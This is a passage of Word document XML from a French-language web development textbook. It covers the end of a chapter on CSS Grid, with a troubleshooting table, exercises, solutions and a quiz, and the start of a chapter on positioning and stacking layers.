              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>minmax(0, 1fr)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>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Écart inattendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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gap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> doublé par une marge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Supprimer les marges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordre visuel différent du DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Placement explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Réordonner le HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>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Hauteur imprévisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Lignes implicites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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grid-auto-rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Grille qui ne se replie pas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Colonnes fixes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>auto-fit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou media query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>L'inspecteur visualise la grille réellement calculée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Vérifier la grille dans le navigateur */</w:t>
        <w:br/>
        <w:t>/* Outils de développement → Éléments → badge « grid » à côté du conteneur</w:t>
        <w:br/>
        <w:t xml:space="preserve">  */</w:t>
        <w:br/>
        <w:t>/* Le panneau « Grid » affiche les lignes, les zones et les noms */</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TROIS VÉRIFICATIONS AVANT DE VALIDER UNE GRILLE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 contenu suit-il l'ordre du DOM à l'écran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La grille tient-elle à 320 pixels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Aucune piste ne déborde-t-elle à cause d'un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1fr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> nu ?</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Grid déclare la structure sur le conteneur, sur deux axes.</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fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> désigne une fraction de l'espace libre, pas une proportion du total.</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minmax(0, 1fr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite la plupart des débordements.</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repeat(auto-fit, minmax(...))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adapte une galerie sans media query.</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zones nommées rendent la mise en page lisible.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L'ordre visuel doit respecter l'ordre du DOM.</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Grid pour la page, Flexbox pour l'intérieur des composants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La page se structure. Le chapitre suivant traite le positionnement précis et les couches d'interface : menus, modales, infobulles.</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19.1 — Galerie auto-adaptative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Créez une galerie d'images qui affiche une à quatre colonnes selon la largeur, sans media query.</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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>auto-fit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>minmax</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Ajoutez un espacement cohérent.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le rendu à 320, 768 et 1440 pixels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 19.2 — Mise en page à zones nommées</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Construisez une page : en-tête, barre latérale, contenu, pied, qui passe en une colonne sur mobile.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Déclarez les zones sur le conteneur.</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 xml:space="preserve">Placez chaque région par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grid-area</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Changez la disposition en media query.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 19.3 — Corriger une grille cassée</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Cette grille déborde sur mobile.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.grille { display: grid; grid-template-columns: 1fr 1fr 1fr; gap: 2rem; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.carte { min-width: 320px; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.carte__titre { white-space: nowrap; }</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19.1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.galerie {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: repeat(auto-fit, minmax(220px, 1fr));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.galerie img {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: block;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: 100%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  height: 220px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  object-fit: cover;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 8px;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>À 320 px, une seule colonne ; à 768, trois ; à 1440, quatre ou cinq selon la largeur maximale du conteneur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>object-fit: cover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conserve les proportions en remplissant la cellule ; sans lui, les images seraient déformées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 19.2</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.page {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: 15rem minmax(0, 1fr);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-areas:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "entete entete"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "lateral contenu"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "pied pied";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1.5rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>@media (max-width: 48rem) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .page {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    grid-template-columns: 1fr;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    grid-template-areas: "entete" "contenu" "lateral" "pied";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les noms de zones doivent former un rectangle : une zone en L est invalide et la déclaration entière est ignorée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sur mobile, l'ordre des zones place le contenu avant la barre latérale : l'information principale reste en tête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 19.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois colonnes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur un écran de 360 px donnent des cellules de 120 px moins le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : le contenu insécable déborde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>min-width: 320px</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sur la carte est incompatible avec une cellule de 120 px : la carte force la grille à s'élargir.</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.grille {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: grid;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grid-template-columns: repeat(auto-fit, minmax(240px, 1fr));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: 1rem;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.carte { min-width: 0; }</w:t>
        <w:br/>
        <w:t>.carte__titre { white-space: normal; overflow-wrap: anywhere; }</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 xml:space="preserve">Que représente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1fr</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 pixel</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Une fraction de l'espace libre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Une ligne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Une colonne fixe</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Quelle fonction crée une galerie adaptative sans media query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repeat(3, 1fr)</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repeat(auto-fit, minmax(15rem, 1fr))</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minmax(0, 1fr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul</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subgrid</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 xml:space="preserve">Pourquoi préférer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>minmax(0, 1fr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1fr</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Pour avoir des colonnes plus larges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Pour empêcher le contenu insécable de faire déborder la piste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Pour centrer le contenu</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 xml:space="preserve">Pour activer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>gap</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 xml:space="preserve">Quel est l'effet de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grid-template-areas</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Créer des variables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Définir des zones nommées pour placer les éléments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Animer la grille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Imbriquer des grilles</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Quel modèle pour l'intérieur d'une carte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Grid</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Flexbox</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Float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Position absolue</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Les fractions se partagent l'espace restant après déduction des tailles fixes et des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>auto-fit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> crée autant de pistes que possible selon la largeur, avec un minimum garanti par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>minmax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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La valeur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> implicite de la taille minimale empêche la piste de rétrécir sous son contenu ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lève cette contrainte.</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Les zones nommées décrivent la disposition et se placent avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grid-area</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Pour un composant à une dimension (empiler un titre, un texte, un pied), Flexbox reste le plus simple.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>20. Positionnement et couches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sortir du flux sans casser la page : position, empilement, menus et fenêtres modales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 19</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Choisir entre flux normal, position relative, absolue, fixe et sticky.</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Comprendre les contextes d'empilement et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>z-index</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Construire un menu déroulant et une fenêtre modale accessibles.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Éviter les pièges du positionnement absolu.</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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>position: sticky</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans effet de bord.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>20.1 Cinq valeurs de position</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le flux normal place les éléments selon leur ordre dans le document. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> permet d'en sortir, partiellement ou totalement. Chaque valeur correspond à un besoin précis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.65 — Cinq valeurs de position et leur référence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150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Valeur</w:t>
            </w:r>
